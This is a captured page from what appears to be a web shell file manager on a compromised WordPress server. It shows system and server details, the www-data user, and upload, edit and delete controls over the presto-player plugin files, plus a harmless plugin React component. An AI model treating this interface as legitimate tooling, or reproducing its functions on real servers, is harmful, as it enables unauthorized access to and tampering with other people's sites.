[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
src
/
admin
/
analytics
/
pages
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 AnalyticsUpgrade.js
820 B
SET
[ EDIT ]
|
[ DEL ]
📄 Dashboard.js
2,311 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: AnalyticsUpgrade.js
const { __ } = wp.i18n; import Illustration from "./illustration"; const { Flex, FlexItem, FlexBlock } = wp.components; export default () => { return ( <Flex style={{ padding: "30px", background: "#fff" }}> <FlexItem> <Illustration width="250px" /> </FlexItem> <FlexBlock style={{ marginLeft: "20px" }}> <h1>{__("Get detailed video insights.", "presto-player")}</h1> <p> {__( "Upgrade to Pro and get video insights like plays, watch-time, and drop off numbers.", "presto-player" )} </p> <a href="https://prestoplayer.com" target="_blank" className="button button-primary" > {__("Learn More", "presto-player")} </a> </FlexBlock> </Flex> ); };